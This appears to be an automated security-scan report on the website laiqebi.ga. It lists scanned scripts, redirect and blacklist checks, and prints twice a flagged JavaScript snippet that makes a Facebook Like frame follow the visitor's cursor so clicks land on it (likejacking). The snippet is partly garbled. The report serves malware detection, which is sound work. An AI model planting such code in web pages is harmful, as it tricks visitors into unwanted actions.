Scanned pages/files
Request | Server response | Status |
http://laiqebi.ga/news/2014-04-26-71 | 200 OK Content-Length: 55606 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below):

    (function(){
        var Xcord = 0, Ycord = 0, IE = document.all ? true : false;
        if (!IE) document.captureEvents(Event.MOUSEMOVE);
        var lbox = document.createElement('iframe');
        lbox.src = 'http://www.facebook.com/plugins/like.php?href=' + encodeURIComponent( 'https://www.facebook.com/myfilmi.in') + '&layout=standard&show_faces=true&width=53&action=lbox&colorscheme=light&height=80' + ' style="z-index:9999999999999999999999999999 }, 9000);
        function mouseMove(e) {
            if (IE) {
                Xcord = event.clientX + document.body.scrollLeft;
                Ycord = event.clientY + document.body.scrollTop;
            } else {
                Xcord = e.pageX;
                Ycord = e.pageY;
            }
            if (Xcord < 0) Xcord = 0;
            if (Ycord < 0) Ycord = 0;
            lbox.style.top = (Ycord - 8) + 'px';
            lbox.style.left = (Xcord - 1) + 'px';
            return true
        }
    })();

Antivirus reports:
http://s104.ucoz.net/src/jquery-1.7.2.js | 200 OK Content-Length: 94840 Content-Type: text/javascript | clean |
http://s104.ucoz.net/src/ulightbox/ulightbox.js | 200 OK Content-Length: 22097 Content-Type: text/javascript | clean |
http://s104.ucoz.net/src/uwnd.js?2 | 200 OK Content-Length: 228554 Content-Type: text/javascript | clean |
http://s58.ucoz.net/src/jquery-1.7.2.js | 200 OK Content-Length: 94840 Content-Type: text/javascript | clean |
http://laiqebi.ga/designs_34/jquery.easing.js | 200 OK Content-Length: 8097 Content-Type: text/javascript | clean |
http://laiqebi.ga/designs_34/script.js | 200 OK Content-Length: 14174 Content-Type: text/javascript | clean |
http://laiqebi.ga/designs_34/scripts.js | 200 OK Content-Length: 866 Content-Type: text/javascript | clean |
http://counter.top.ge/cgi-bin/cod?100+95092 | 200 OK Content-Length: 374 Content-Type: application/x-javascript | clean |
http://links.boom.ge/jc.php?id=60048 | 200 OK Content-Length: 276 Content-Type: text/html | clean |
http://links.boom.ge/test404page.js | 404 Not Found Content-Length: 483 Content-Type: text/html | clean |
http://trafka.ru/code/popup.php?id=313 | HTTP/1.1 301 Moved Permanently Connection: close Date: Wed, 22 Oct 2014 06:25:25 GMT Location: http://www.trafka.ru/code/popup.php?id=313 Server: nginx Vary: Accept-Encoding Content-Length: 325 Content-Type: text/html; charset=iso-8859-1 | clean |
http://www.trafka.ru/code/popup.php?id=313 | 200 OK Content-Length: 153 Content-Type: text/html | clean |
http://laiqebi.ga//ajax.googleapis.com/ajax/libs/webfont/1.4.2/webfont.js/ | 404 Not Found Content-Length: 6869 Content-Type: text/html | clean |
http://laiqebi.ga/ | 200 OK Content-Length: 62779 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below):

    (function(){
        var Xcord = 0, Ycord = 0, IE = document.all ? true : false;
        if (!IE) document.captureEvents(Event.MOUSEMOVE);
        var lbox = document.createElement('iframe');
        lbox.src = 'http://www.facebook.com/plugins/like.php?href=' + encodeURIComponent( 'https://www.facebook.com/myfilmi.in') + '&layout=standard&show_faces=true&width=53&action=lbox&colorscheme=light&height=80' + ' style="z-index:9999999999999999999999999999 }, 9000);
        function mouseMove(e) {
            if (IE) {
                Xcord = event.clientX + document.body.scrollLeft;
                Ycord = event.clientY + document.body.scrollTop;
            } else {
                Xcord = e.pageX;
                Ycord = e.pageY;
            }
            if (Xcord < 0) Xcord = 0;
            if (Ycord < 0) Ycord = 0;
            lbox.style.top = (Ycord - 8) + 'px';
            lbox.style.left = (Xcord - 1) + 'px';
            return true
        }
    })();

Antivirus reports:
http://connect.facebook.net/ka_GE/all.js | 200 OK Content-Length: 163835 Content-Type: application/x-javascript | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: laiqebi.ga
Result:
HTTP/1.1 200 OK
Cache-Control: no-cache
Cache-Control: no-store
Cache-Control: private
Connection: close
Date: Wed, 22 Oct 2014 06:25:26 GMT
Pragma: no-cache
Server: uServ/3.2.2
Content-Type: text/html; charset=UTF-8
Set-Cookie: 8musicebiuCoz=; path=/; expires=Mon, 22-Oct-2012 06:25:25 GMT; domain=.laiqebi.ga;
Set-Cookie: 8musicebiuzll=1413959125; path=/; expires=Thu, 22-Oct-2015 06:25:25 GMT; domain=.laiqebi.ga;
Set-Cookie: 8musicebiuCoz=; path=/; expires=Mon, 22-Oct-2012 06:25:25 GMT; domain=.laiqebi.ga;
Second query (visit from search engine):
GET / HTTP/1.1
Host: laiqebi.ga
Referer: http://www.google.com/search?q=laiqebi.ga
Result:
The result is similar to the first query. There are no suspicious redirects found.
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=laiqebi.ga
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://laiqebi.ga/
Result: laiqebi.ga is not infected or malware details are not published yet.